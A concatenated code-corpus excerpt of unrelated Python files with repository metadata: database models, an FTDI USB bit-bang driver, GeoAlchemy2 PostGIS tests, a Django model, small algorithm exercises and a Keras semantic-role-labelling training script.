sort_name = "Settings"
date = Column("DateModified", DateTime, primary_key=True)
db_version = Column("DBVersion", Integer, nullable=False)
last_word_id = Column("LastWID", Integer, nullable=False)
db_release = Column("DBRelease", String(16), nullable=False)
class AccessSyllable(Base, BaseFunctions):
"""
Syllable model
"""
__tablename__ = "Syllable"
sort_name = "Syllable"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column("characters", String(8), primary_key=True)
type = Column(String(32), nullable=False)
allowed = Column(Boolean)
class AccessType(Base, BaseFunctions):
"""
Type model
"""
__tablename__ = "Type"
sort_name = "Type"
id = Column(Integer, primary_key=True)
type = Column(String(16), nullable=False)
type_x = Column(String(16), nullable=False)
group = Column(String(16), nullable=False)
parentable = Column(Boolean, nullable=False)
description = Column(String(255), nullable=True)
class AccessWord(Base, BaseFunctions):
"""
Word model
"""
__tablename__ = "Words"
sort_name = "Word"
word_id = Column("WID", Integer, nullable=False, primary_key=True)
type = Column("Type", String(16), nullable=False)
type_x = Column("XType", String(16), nullable=False)
affixes = Column("Affixes", String(16))
match = Column("Match", String(8))
authors = Column("Source", String(64))
year = Column("Year", String(128))
rank = Column("Rank", String(128))
origin = Column("Origin", String(128))
origin_x = Column("OriginX", String(64))
used_in = Column("UsedIn", Text)
TID_old = Column("TID", Integer) # references
class AccessWordSpell(Base, BaseFunctions):
"""WordSpell model"""
__tablename__ = "WordSpell"
sort_name = "WordSpell"
word_id = Column("WID", Integer, nullable=False)
word = Column("Word", String(64), nullable=False)
sort_a = Column("SortA", String(64), nullable=False)
sort_b = Column("SortB", String(64), nullable=False)
event_start_id = Column("SEVT", Integer, nullable=False)
event_end_id = Column("EEVT", Integer, nullable=False)
origin_x = Column("OriginX", String(64))
id = Column(Integer, primary_key=True)
'''
class AccessXWord(Base, BaseFunctions):
"""XWord model"""
__tablename__ = "XWord"
sort_name = "XWord"
XSortA = Column(String)
XSortB = Column(String)
WID = Column(String, primary_key=True)
I = Column(String)
XWord = Column(String)
'''
| 28.627219
| 84
| 0.65895
| 4,350
| 0.899132
| 0
| 0
| 333
| 0.06883
| 0
| 0
| 1,079
| 0.223026
|
49dbc6af92d52afcc0e8a89b6aa09a1a1c7354f4
| 16,726
|
py
|
Python
|
src/fixate/drivers/ftdi.py
|
stig999/Fixate
|
24b4a16736c80b28f40aeb52972c52f9654983ef
|
[
"MIT"
] | 1
|
2017-11-23T04:18:03.000Z
|
2017-11-23T04:18:03.000Z
|
src/fixate/drivers/ftdi.py
|
stig999/Fixate
|
24b4a16736c80b28f40aeb52972c52f9654983ef
|
[
"MIT"
] | 5
|
2018-08-24T11:13:29.000Z
|
2018-08-29T00:40:36.000Z
|
src/fixate/drivers/ftdi.py
|
stig999/Fixate
|
24b4a16736c80b28f40aeb52972c52f9654983ef
|
[
"MIT"
] | null | null | null |
import ctypes
import struct
import time
from fixate.core.common import bits
from fixate.core.exceptions import InstrumentError, InstrumentNotConnected
import fixate.config
import fixate.core.discover
def open(ftdi_description=""):
"""Open is the public api for the bit bang driver for discovering and opening a connection
to a valid bit bang device
:param restrictions:
A dictionary containing the extents of the required equipment
:return:
A instantiated class connected to a valid bit_bang class
"""
devices = fixate.core.discover.discover_ftdi()
for dev in devices:
if ftdi_description.encode() == dev.Description or ftdi_description == "":
return FTDI2xx(dev.Description)
raise InstrumentNotConnected("No valid ftdi found by description '{}'".format(ftdi_description))
# Definitions
UCHAR = ctypes.c_ubyte
PCHAR = ctypes.POINTER(ctypes.c_char)
PUCHAR = ctypes.POINTER(ctypes.c_ubyte)
DWORD = ctypes.c_ulong
LPDWORD = ctypes.POINTER(ctypes.c_ulong)
FT_HANDLE = DWORD
class FT_STATUS(object):
FT_OK = DWORD(0)
FT_INVALID_HANDLE = DWORD(1)
FT_DEVICE_NOT_FOUND = DWORD(2)
FT_DEVICE_NOT_OPENED = DWORD(3)
FT_IO_ERROR = DWORD(4)
FT_INSUFFICIENT_RESOURCES = DWORD(5)
FT_INVALID_PARAMETER = DWORD(6)
FT_INVALID_BAUD_RATE = DWORD(7)
FT_DEVICE_NOT_OPENED_FOR_ERASE = DWORD(8)
FT_DEVICE_NOT_OPENED_FOR_WRITE = DWORD(9)
FT_FAILED_TO_WRITE_DEVICE = DWORD(10)
FT_EEPROM_READ_FAILED = DWORD(11)
FT_EEPROM_WRITE_FAILED = DWORD(12)
FT_EEPROM_ERASE_FAILED = DWORD(13)
FT_EEPROM_NOT_PRESENT = DWORD(14)
FT_EEPROM_NOT_PROGRAMMED = DWORD(15)
FT_INVALID_ARGS = DWORD(16)
FT_NOT_SUPPORTED = DWORD(17)
FT_OTHER_ERROR = DWORD(18)
class FT_DEVICE(object):
FT_DEVICE_232BM = DWORD(0)
FT_DEVICE_232AM = DWORD(1)
FT_DEVICE_100AX = DWORD(2)
FT_DEVICE_UNKNOWN = DWORD(3)
FT_DEVICE_2232C = DWORD(4)
FT_DEVICE_232R = DWORD(5)
FT_DEVICE_2232H = DWORD(6)
FT_DEVICE_4232H = DWORD(7)
FT_DEVICE_232H = DWORD(8)
FT_DEVICE_X_SERIES = DWORD(9)
class FLAGS(object):
FT_OPEN_BY_SERIAL_NUMBER = DWORD(1)
FT_OPEN_BY_DESCRIPTION = DWORD(2)
FT_OPEN_BY_LOCATION = DWORD(4)
class BIT_MODE(object):
FT_BITMODE_RESET = DWORD(0x00)
FT_BITMODE_ASYNC_BITBANG = DWORD(0x01)
FT_BITMODE_MPSSE = DWORD(0x02)
FT_BITMODE_SYNC_BITBANG = DWORD(0x04)
FT_BITMODE_MCU_HOST = DWORD(0x08)
FT_BITMODE_FAST_SERIAL = DWORD(0x10)
FT_BITMODE_CBUS_BITBANG = DWORD(0x20)
FT_BITMODE_SYNC_FIFO = DWORD(0x40)
# Add null padding if 64 bit
if struct.calcsize("P") == 8:
class FT_DEVICE_LIST_INFO_NODE(ctypes.Structure):
_fields_ = [("Flags", DWORD),
("Type", DWORD),
("ID", DWORD),
("LocId", DWORD),
("SerialNumber", ctypes.c_char * 16),
("Description", ctypes.c_char * 64),
("ftHandle", DWORD),
("null_padding", DWORD)]
else: # 32 bit
class FT_DEVICE_LIST_INFO_NODE(ctypes.Structure):
_fields_ = [("Flags", DWORD),
("Type", DWORD),
("ID", DWORD),
("LocId", DWORD),
("SerialNumber", ctypes.c_char * 16),
("Description", ctypes.c_char * 64),
("ftHandle", DWORD)]
class WORD_LENGTH(object):
FT_BITS_8 = UCHAR(8)
FT_BITS_7 = UCHAR(7)
class STOP_BITS(object):
FT_STOP_BITS_1 = UCHAR(0)
FT_STOP_BITS_2 = UCHAR(2)
class PARITY(object):
FT_PARITY_NONE = UCHAR(0)
FT_PARITY_ODD = UCHAR(1)
FT_PARITY_EVEN = UCHAR(2)
FT_PARITY_MARK = UCHAR(3)
FT_PARITY_SPACE = UCHAR(4)
try:
ftdI2xx = ctypes.WinDLL("FTD2XX.dll")
except Exception as e:
raise ImportError("Unable to find FTD2XX.dll.\nPlugging in FDTI device will install DLL.") from e
_ipdwNumDevs = DWORD(0)
_p_ipdwNumDevs = LPDWORD(_ipdwNumDevs)
def create_device_info_list():
# FT_CreateDeviceInfoList needs to be called before info can be retrieved
stat = DWORD()
stat.value = ftdI2xx.FT_CreateDeviceInfoList(_p_ipdwNumDevs)
# print(stat)
if stat.value != FT_STATUS.FT_OK.value:
pass
# print(stat)
# print(type(stat))
# print(type(FT_STATUS.FT_OK))
# print(ipdwNumDevs)
def _get_device_info_detail(pDest):
# FT_GetDeviceInfoDetail
stat = DWORD()
dev = pDest[0]
handle = DWORD()
flags = DWORD()
typeid = DWORD()
id = DWORD()
locid = DWORD()
sn = ctypes.create_string_buffer(16)
desc = ctypes.create_string_buffer(64)
stat.value = ftdI2xx.FT_GetDeviceInfoDetail(dev,
flags,
typeid,
id,
locid,
sn,
desc,
ctypes.byref(handle))
if stat.value != FT_STATUS.FT_OK.value:
raise Exception("FT_GetDeviceInfoDetail failed")
# print("flags {}".format(flags))
# print("typeid {}".format(typeid))
# print("id {}".format(id))
# print("locid {}".format(locid))
# print("sn {}".format(sn))
# print("desc {}".format(desc))
# print("handle {}".format(handle))
# FT_GetDeviceInfoList
def get_device_info_list():
stat = DWORD()
pDest = (FT_DEVICE_LIST_INFO_NODE * _ipdwNumDevs.value)()
# for num in range(_ipdwNumDevs.value):
# print(dir(pDest[num]))
# print(pDest[num].Flags)
stat.value = ftdI2xx.FT_GetDeviceInfoList(pDest, ctypes.byref(_ipdwNumDevs))
if stat.value != FT_STATUS.FT_OK.value:
raise Exception("FT_GetDeviceInfoList failed")
# for field in FT_DEVICE_LIST_INFO_NODE._fields_:
# print("{}: {} - {}".format(field[0].upper(), getattr(pDest[0], field[0]), type(getattr(pDest[0], field[0]))))
return pDest
class FTDI2xx(object):
INSTR_TYPE = "FTDI"
def __init__(self, ftdi_description):
"""
:param handle:
handle from device info
:param flag:
FLAGS
FLAGS.FT_OPEN_BY_SERIAL_NUMBER
FLAGS.FT_OPEN_BY_DESCRIPTION
FLAGS.FT_OPEN_BY_LOCATION
:param search_term:
Accompanying search term set by the flag
:return:
"""
self.handle = DWORD()
self.ftdi_description = ftdi_description
self.cmd_status = DWORD()
self._connect()
self._baud_rate = None
self.baud_rate = 9600
self.bit_mode = BIT_MODE.FT_BITMODE_CBUS_BITBANG
self.pin_value_mask = 0b111
self.std_delay = 0.01
self.delay = time.sleep
# Data characteristics
self._word_length = WORD_LENGTH.FT_BITS_8
self._stop_bits = STOP_BITS.FT_STOP_BITS_1
self._parity = PARITY.FT_PARITY_NONE
self._data_characteristics_set = False
self.bb_data = 1 << 0
self.bb_clk = 1 << 1
self.bb_latch = 1 << 2
self.bb_bytes = 1
self.bb_inv_mask = 0
def _connect(self):
self.cmd_status.value = ftdI2xx.FT_OpenEx(ctypes.c_char_p(self.ftdi_description),
FLAGS.FT_OPEN_BY_DESCRIPTION,
ctypes.byref(self.handle))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_OpenEx failed")
def close(self):
self.cmd_status.value = ftdI2xx.FT_Close(self.handle)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_Close failed {}".format(self.cmd_status.value))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
@property
def word_length(self):
return self._word_length
@word_length.setter
def word_length(self, val):
if str(val) == '8':
self._word_length = WORD_LENGTH.FT_BITS_8
elif str(val) == '7':
self._word_length = WORD_LENGTH.FT_BITS_7
else:
raise ValueError("Word Length must be either 7 or 8")
self._data_characteristics_set = False
@property
def stop_bits(self):
return self._stop_bits
@stop_bits.setter
def stop_bits(self, val):
if str(val) == '1':
self._stop_bits = STOP_BITS.FT_STOP_BITS_1
elif str(val) == '2':
self._stop_bits = STOP_BITS.FT_STOP_BITS_2
else:
raise ValueError("Stop bits must be either 1 or 2")
self._data_characteristics_set = False
@property
def parity(self):
return self._parity
@parity.setter
def parity(self, val):
try:
parity = [itm for itm in PARITY.__dict__ if itm.startswith('FT_PARITY') and val.upper() in itm][0]
except IndexError:
raise ValueError("Invalid parity: Please select from {}".
format(','.join([itm for itm in PARITY.__dict__ if itm.startswith('FT_PARITY')])))
self._parity = getattr(PARITY, parity)
self._data_characteristics_set = False
@property
def baud_rate(self):
return self._baud_rate
@baud_rate.setter
def baud_rate(self, rate):
try:
self.cmd_status.value = ftdI2xx.FT_SetBaudRate(self.handle, DWORD(rate))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetBaudRate failed")
self._baud_rate = rate
except:
self._baud_rate = None
raise
def write_bit_mode(self, mask, validate=False):
"""
handle; gained from device info
mask; value to write for the mask
for BIT_MODE.FT_BITMODE_CBUS_BITBANG
upper nibble is input (0) output (1)
lower nibble is pin value low (0) high (1)
bit_mode; Type BIT_MODE
"""
self.cmd_status.value = ftdI2xx.FT_SetBitMode(self.handle, UCHAR(mask), self.bit_mode)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetBitMode failed")
data_bus = UCHAR()
if validate:
self.cmd_status.value = ftdI2xx.FT_GetBitMode(self.handle, ctypes.byref(data_bus))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_GetBitMode failed")
return data_bus.value & self.pin_value_mask == mask & self.pin_value_mask
def get_cbus_pins(self):
try:
self.cmd_status.value = ftdI2xx.FT_SetBitMode(self.handle, UCHAR(0), BIT_MODE.FT_BITMODE_CBUS_BITBANG)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetBitMode failed")
data_bus = UCHAR()
self.cmd_status.value = ftdI2xx.FT_GetBitMode(self.handle, ctypes.byref(data_bus))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_GetBitMode failed")
finally:
self.cmd_status.value = ftdI2xx.FT_SetBitMode(self.handle, UCHAR(self.pin_value_mask), self.bit_mode)
return data_bus.value
# self.write_bit_mode(self.pin_value_mask)
def write(self, data, size=None):
if not self._data_characteristics_set:
self._set_data_characteristics()
if size is None:
size = len(data)
buffer = ctypes.create_string_buffer(bytes(data), size)
bytes_written = DWORD()
self.cmd_status.value = ftdI2xx.FT_Write(self.handle,
buffer,
ctypes.sizeof(buffer),
ctypes.byref(bytes_written))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_Write failed")
def read(self):
buffer = self._read()
return buffer.value
def read_raw(self):
buffer = self._read()
return buffer.raw
def _read(self):
if not self._data_characteristics_set:
self._set_data_characteristics()
amount_in_rx_queue = DWORD()
amount_in_tx_queue = DWORD()
status = DWORD()
self.cmd_status.value = ftdI2xx.FT_GetStatus(self.handle,
ctypes.byref(amount_in_rx_queue),
ctypes.byref(amount_in_tx_queue),
ctypes.byref(status))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_GetStatus failed")
buffer = ctypes.create_string_buffer(amount_in_rx_queue.value)
bytes_read = DWORD()
self.cmd_status.value = ftdI2xx.FT_Read(self.handle,
ctypes.byref(buffer),
amount_in_rx_queue,
ctypes.byref(bytes_read))
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_Read failed")
return buffer
def _set_data_characteristics(self):
if not [x for x in [self.word_length, self.stop_bits, self.parity] if x is None]:
self.cmd_status.value = ftdI2xx.FT_SetDataCharacteristics(self.handle,
self.word_length,
self.stop_bits,
self.parity)
if self.cmd_status.value != FT_STATUS.FT_OK.value:
raise InstrumentError("FT_SetDatCharacteristics failed")
self._data_characteristics_set = True
return
raise ValueError("Please ensure that word length, stop bits and parity are set")
def serial_shift_bit_bang(self, data, bytes_required=None):
bytes_required = bytes_required or self.bb_bytes
if self.bit_mode == BIT_MODE.FT_BITMODE_CBUS_BITBANG:
bit_bang = self._serial_shift_bit_bang(data, bytes_required,
bb_mask=(self.bb_clk + self.bb_data + self.bb_latch) << 4)
for byte in bit_bang:
self.write_bit_mode(byte)
else:
bit_bang = self._serial_shift_bit_bang(data, bytes_required, bb_mask=0)
self.write(bit_bang)
def configure_bit_bang(self, bit_mode, bytes_required, latch_mask=1, clk_mask=2, data_mask=4, invert_mask=0b000):
"""
:param bit_mode:
:param bytes_required:
:param latch_mask: CBUS Pin for latch. 1 Default for Relay Matrix
:param clk_mask: CBUS Pin for clock. 2 Default for Relay Matrix
:param data_mask: CBUS Pin for data. 4 Default for Relay Matrix
:param invert_mask: Mask for inverting: 0b111 for all inverted, 0b000 for all non-inverted,
based on MSB 0b<latch><clock><data> LSB
:return:
"""
self.bb_bytes = bytes_required
self.bit_mode = bit_mode
self.write_bit_mode(self.pin_value_mask)
self.bb_data = data_mask
self.bb_clk = clk_mask
self.bb_latch = latch_mask
self.bb_inv_mask = 0
if (1 << 2) & invert_mask:
self.bb_inv_mask += self.bb_latch
if (1 << 1) & invert_mask:
self.bb_inv_mask += self.bb_clk
if 1 & invert_mask:
self.bb_inv_mask += self.bb_data
def _serial_shift_bit_bang(self, data, bytes_required, bb_mask):
data_out = bytearray()
data_out.append(bb_mask + self.bb_inv_mask)
for b in bits(data, num_bytes=bytes_required):
# Write Data
if b:
data_out.append(bb_mask + self.bb_data ^ self.bb_inv_mask)
# Clock Up
data_out.append(bb_mask + (self.bb_data + self.bb_clk) ^ self.bb_inv_mask)
else:
data_out.append(bb_mask + self.bb_inv_mask)
# Clock Up
data_out.append(bb_mask + self.bb_clk ^ self.bb_inv_mask)
# Latch to output
data_out.append(bb_mask + self.bb_inv_mask)
data_out.append(bb_mask + self.bb_latch ^ self.bb_inv_mask)
data_out.append(bb_mask + self.bb_inv_mask)
return data_out
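# --- Hedged usage sketch (not part of the original driver) -----------------
# Minimal illustration of how the driver above is typically exercised:
# discover a device by description, configure CBUS bit-bang for a one-byte
# shift register and clock a pattern out. The description string
# "FT230X Basic UART" is purely a placeholder; use whatever your hardware
# reports.
if __name__ == "__main__":
    ftdi = open("FT230X Basic UART")  # module-level open(), not the builtin
    try:
        ftdi.configure_bit_bang(BIT_MODE.FT_BITMODE_CBUS_BITBANG, bytes_required=1)
        ftdi.serial_shift_bit_bang(0b10101010)  # shift one byte to the outputs
    finally:
        ftdi.close()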
| 36.679825
| 117
| 0.598589
| 13,227
| 0.790805
| 0
| 0
| 1,786
| 0.10678
| 0
| 0
| 3,005
| 0.17966
|
49dc810a61e2972f79b20f3f39e3b0c03cad34a5
| 552
|
py
|
Python
|
Data Structures/Python/find-the-parity-outier.py
|
KhushMody/Ds-Algo-HacktoberFest
|
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
|
[
"MIT"
] | 12
|
2020-10-04T06:48:29.000Z
|
2021-02-16T17:54:04.000Z
|
Data Structures/Python/find-the-parity-outier.py
|
KhushMody/Ds-Algo-HacktoberFest
|
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
|
[
"MIT"
] | 14
|
2020-10-04T09:09:52.000Z
|
2021-10-16T19:59:23.000Z
|
Data Structures/Python/find-the-parity-outier.py
|
KhushMody/Ds-Algo-HacktoberFest
|
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
|
[
"MIT"
] | 55
|
2020-10-04T03:09:25.000Z
|
2021-10-16T09:00:12.000Z
|
# You are given an array (which will have a length of at least 3, but could be very large) containing integers. The array is either entirely comprised of odd integers or entirely comprised of even integers except for a single integer N. Write a method that takes the array as an argument and returns this "outlier" N.
# Examples
# find_outlier([2, 4, 6, 7]) => 7
# find_outlier([3, 7, 11, 2]) => 2
def find_outlier(integers):
l = list(filter(lambda x: x%2==0, integers))
return list(filter(lambda x: x%2, integers))[0] if len(l) > 1 else l[0]
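# Minimal sanity check (added illustration, not part of the original
# snippet); it replays the examples from the problem statement above.
if __name__ == "__main__":
    assert find_outlier([2, 4, 6, 7]) == 7
    assert find_outlier([3, 7, 11, 2]) == 2
    assert find_outlier([160, 3, 1719, 19, 11, 13, -21]) == 160
    print("find_outlier: all sample checks passed")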
| 61.333333
| 317
| 0.711957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 394
| 0.713768
|
49dd8d278f7b65614e35a417984b39bb22fa9ca9
| 5,621
|
py
|
Python
|
geoalchemy2/tests/test_functional.py
|
fredj/geoalchemy2
|
9f26714e8d181440ac03d7295d34d615cac11d02
|
[
"MIT"
] | null | null | null |
geoalchemy2/tests/test_functional.py
|
fredj/geoalchemy2
|
9f26714e8d181440ac03d7295d34d615cac11d02
|
[
"MIT"
] | null | null | null |
geoalchemy2/tests/test_functional.py
|
fredj/geoalchemy2
|
9f26714e8d181440ac03d7295d34d615cac11d02
|
[
"MIT"
] | null | null | null |
import unittest
from nose.tools import eq_, ok_, raises
from sqlalchemy import create_engine, MetaData, Column, Integer, func
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from geoalchemy2 import Geometry
from sqlalchemy.exc import DataError, IntegrityError, InternalError
engine = create_engine('postgresql://gis:gis@localhost/gis', echo=True)
metadata = MetaData(engine)
Base = declarative_base(metadata=metadata)
class Lake(Base):
__tablename__ = 'lake'
id = Column(Integer, primary_key=True)
geom = Column(Geometry(geometry_type='LINESTRING', srid=4326))
def __init__(self, geom):
self.geom = geom
session = sessionmaker(bind=engine)()
postgis_version = session.execute(func.postgis_version()).scalar()
if not postgis_version.startswith('2.'):
# With PostGIS 1.x the AddGeometryColumn and DropGeometryColumn
# management functions should be used.
Lake.__table__.c.geom.type.management = True
class IndexTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
session.rollback()
metadata.drop_all()
def test_LakeIndex(self):
""" Make sure the Lake table has an index on the geom column """
from sqlalchemy.engine import reflection
inspector = reflection.Inspector.from_engine(engine)
indices = inspector.get_indexes(Lake.__tablename__)
eq_(len(indices), 1)
index = indices[0]
eq_(index.get('unique'), False)
eq_(index.get('column_names'), [u'geom'])
class InsertionTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
session.rollback()
metadata.drop_all()
@raises(DataError, IntegrityError)
def test_WKT(self):
# With PostGIS 1.5:
# IntegrityError: (IntegrityError) new row for relation "lake" violates
# check constraint "enforce_srid_geom"
#
# With PostGIS 2.0:
# DataError: (DataError) Geometry SRID (0) does not match column SRID
# (4326)
l = Lake('LINESTRING(0 0,1 1)')
session.add(l)
session.flush()
def test_WKTElement(self):
from geoalchemy2 import WKTElement, WKBElement
l = Lake(WKTElement('LINESTRING(0 0,1 1)', srid=4326))
session.add(l)
session.flush()
session.expire(l)
ok_(isinstance(l.geom, WKBElement))
wkt = session.execute(l.geom.ST_AsText()).scalar()
eq_(wkt, 'LINESTRING(0 0,1 1)')
srid = session.execute(l.geom.ST_SRID()).scalar()
eq_(srid, 4326)
class CallFunctionTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
session.rollback()
metadata.drop_all()
def _create_one(self):
from geoalchemy2 import WKTElement
l = Lake(WKTElement('LINESTRING(0 0,1 1)', srid=4326))
session.add(l)
session.flush()
return l.id
def test_ST_GeometryType(self):
from sqlalchemy.sql import select, func
lake_id = self._create_one()
s = select([func.ST_GeometryType(Lake.__table__.c.geom)])
r1 = session.execute(s).scalar()
eq_(r1, 'ST_LineString')
lake = session.query(Lake).get(lake_id)
r2 = session.execute(lake.geom.ST_GeometryType()).scalar()
eq_(r2, 'ST_LineString')
r3 = session.query(Lake.geom.ST_GeometryType()).scalar()
eq_(r3, 'ST_LineString')
r4 = session.query(Lake).filter(
Lake.geom.ST_GeometryType() == 'ST_LineString').one()
ok_(isinstance(r4, Lake))
eq_(r4.id, lake_id)
def test_ST_Buffer(self):
from sqlalchemy.sql import select, func
from geoalchemy2 import WKBElement, WKTElement
lake_id = self._create_one()
s = select([func.ST_Buffer(Lake.__table__.c.geom, 2)])
r1 = session.execute(s).scalar()
ok_(isinstance(r1, WKBElement))
lake = session.query(Lake).get(lake_id)
r2 = session.execute(lake.geom.ST_Buffer(2)).scalar()
ok_(isinstance(r2, WKBElement))
r3 = session.query(Lake.geom.ST_Buffer(2)).scalar()
ok_(isinstance(r3, WKBElement))
ok_(r1.data == r2.data == r3.data)
r4 = session.query(Lake).filter(
func.ST_Within(WKTElement('POINT(0 0)', srid=4326),
Lake.geom.ST_Buffer(2))).one()
ok_(isinstance(r4, Lake))
eq_(r4.id, lake_id)
@raises(InternalError)
def test_ST_Buffer_Mixed_SRID(self):
from sqlalchemy.sql import func
self._create_one()
session.query(Lake).filter(
func.ST_Within('POINT(0 0)',
Lake.geom.ST_Buffer(2))).one()
class ReflectionTest(unittest.TestCase):
def setUp(self):
metadata.drop_all(checkfirst=True)
metadata.create_all()
def tearDown(self):
metadata.drop_all()
def test_reflection(self):
from sqlalchemy import Table
from geoalchemy2 import Geometry
t = Table('lake', MetaData(), autoload=True, autoload_with=engine)
type_ = t.c.geom.type
ok_(isinstance(type_, Geometry))
if not postgis_version.startswith('2.'):
eq_(type_.geometry_type, 'GEOMETRY')
eq_(type_.srid, -1)
else:
eq_(type_.geometry_type, 'LINESTRING')
eq_(type_.srid, 4326)
| 29.898936
| 79
| 0.637609
| 4,827
| 0.858744
| 0
| 0
| 698
| 0.124177
| 0
| 0
| 677
| 0.120441
|
49de3b66d3ba8d7b390aa4f38533368a7826b8e9
| 689
|
py
|
Python
|
WebEmpresarial/social/models.py
|
MarcosKlender/Web_Empresarial
|
79b481488a74415e88898cff029233f339dc1e97
|
[
"BSD-3-Clause"
] | null | null | null |
WebEmpresarial/social/models.py
|
MarcosKlender/Web_Empresarial
|
79b481488a74415e88898cff029233f339dc1e97
|
[
"BSD-3-Clause"
] | null | null | null |
WebEmpresarial/social/models.py
|
MarcosKlender/Web_Empresarial
|
79b481488a74415e88898cff029233f339dc1e97
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
# Create your models here.
class Link(models.Model):
key = models.SlugField(max_length = 100, unique = True, verbose_name = 'Nombre Clave')
name = models.CharField(max_length = 200, verbose_name = 'Red Social')
url = models.URLField(max_length = 200, null = True, blank = True, verbose_name = 'Enlace')
created = models.DateTimeField(auto_now_add = True, verbose_name = 'Fecha de Creación')
updated = models.DateTimeField(auto_now = True, verbose_name = 'Fecha de Edición')
class Meta:
verbose_name = 'enlace'
verbose_name_plural = 'enlaces'
ordering = ['name']
def __str__(self):
return self.name
| 40.529412
| 95
| 0.685051
| 634
| 0.917511
| 0
| 0
| 0
| 0
| 0
| 0
| 122
| 0.176556
|
49df0f9be98b9b2a452a359335aef6fd2e914b5c
| 940
|
py
|
Python
|
p138_copy_list_with_random_pointer.py
|
moonfruit/leetcode
|
796b736d9b7b31f8052df6a0a140e34904b8230c
|
[
"MIT"
] | null | null | null |
p138_copy_list_with_random_pointer.py
|
moonfruit/leetcode
|
796b736d9b7b31f8052df6a0a140e34904b8230c
|
[
"MIT"
] | null | null | null |
p138_copy_list_with_random_pointer.py
|
moonfruit/leetcode
|
796b736d9b7b31f8052df6a0a140e34904b8230c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Definition for singly-linked list with a random pointer.
# class RandomListNode:
# def __init__(self, x):
# self.label = x
# self.next = None
# self.random = None
class Solution:
# @param head, a RandomListNode
# @return a RandomListNode
def copyRandomList(self, head):
if head is None:
return None
from copy import copy
old = head
new = ret = copy(head)
save = {None: None, old: new}
while old.next:
old = old.next
save[old] = new.next = copy(old)
new = new.next
new = ret
while new:
new.random = save[new.random]
new = new.next
return ret
if __name__ == '__main__':
from leetcode import RandomListNode
head = RandomListNode.new(1,2,3,4,5,6)
head.print()
Solution().copyRandomList(head).print()
| 22.926829
| 58
| 0.554255
| 537
| 0.571277
| 0
| 0
| 0
| 0
| 0
| 0
| 286
| 0.304255
|
49e017e3c7994fdc80e6366ccb4d6c457be60b26
| 1,904
|
py
|
Python
|
train.py
|
jmnybl/finnish-srl
|
aa53bc5e27e8c9e82bc9827602e448d805b4a960
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
jmnybl/finnish-srl
|
aa53bc5e27e8c9e82bc9827602e448d805b4a960
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
jmnybl/finnish-srl
|
aa53bc5e27e8c9e82bc9827602e448d805b4a960
|
[
"Apache-2.0"
] | null | null | null |
from data_reader import Vocabulary, transform_data, save_vocabularies, Corpus
from model import build_model
from keras.callbacks import ModelCheckpoint
def train(args):
# ARGUMENTS
training_file=args.data
minibatch=64
max_sent_len_words=30
epochs=args.epochs
corpus=Corpus(training_file,test_time=False)
## VOCABULARY
vs=Vocabulary()
vs.build(corpus,min_count_word=args.min_count_word,min_count_sense=args.min_count_sense)
sentences,x,y=transform_data(corpus,vs,max_sent_len_words)
model=build_model(vs,max_sent_len_words)
# save model json
model_json = model.to_json()
with open(args.model_name+".json", "w") as json_file:
json_file.write(model_json)
save_vocabularies(vs,args.model_name+"-vocab.pickle")
# +".{epoch:02d}.h5"
save_cb=ModelCheckpoint(filepath=args.model_name+".h5", monitor='val_loss', verbose=1, save_best_only=True, mode='auto')
model.fit(x,y,batch_size=minibatch,epochs=epochs,verbose=1,validation_split=0.1,callbacks=[save_cb])
if __name__=="__main__":
import argparse
parser = argparse.ArgumentParser(description='')
g=parser.add_argument_group("Reguired arguments")
g.add_argument('-d', '--data', type=str, required=True, help='Training file')
g.add_argument('-m', '--model_name', type=str, required=True, help='Name of the saved model')
g.add_argument('--min_count_word', type=int, default=2, help='Frequency threshold, how many times a word must occur to be included in the vocabulary? (default %(default)d)')
g.add_argument('--min_count_sense', type=int, default=2, help='Frequency threshold, how many times a verb sense must occur to be included in the vocabulary? (default %(default)d)')
g.add_argument('--epochs', type=int, default=10, help='Number of training epochs')
args = parser.parse_args()
train(args)
| 33.403509
| 184
| 0.719538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 511
| 0.268382
|
49e1f87f1d26cc79c1491809b52a416913e40d98
| 6,198
|
py
|
Python
|
peekingduck/utils/requirement_checker.py
|
ericleehy/PeekingDuck
|
8cf1be842235fa60bac13bc466cac09747a780ea
|
[
"Apache-2.0"
] | 1
|
2021-12-02T05:15:58.000Z
|
2021-12-02T05:15:58.000Z
|
peekingduck/utils/requirement_checker.py
|
ericleehy/PeekingDuck
|
8cf1be842235fa60bac13bc466cac09747a780ea
|
[
"Apache-2.0"
] | null | null | null |
peekingduck/utils/requirement_checker.py
|
ericleehy/PeekingDuck
|
8cf1be842235fa60bac13bc466cac09747a780ea
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 AI Singapore
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
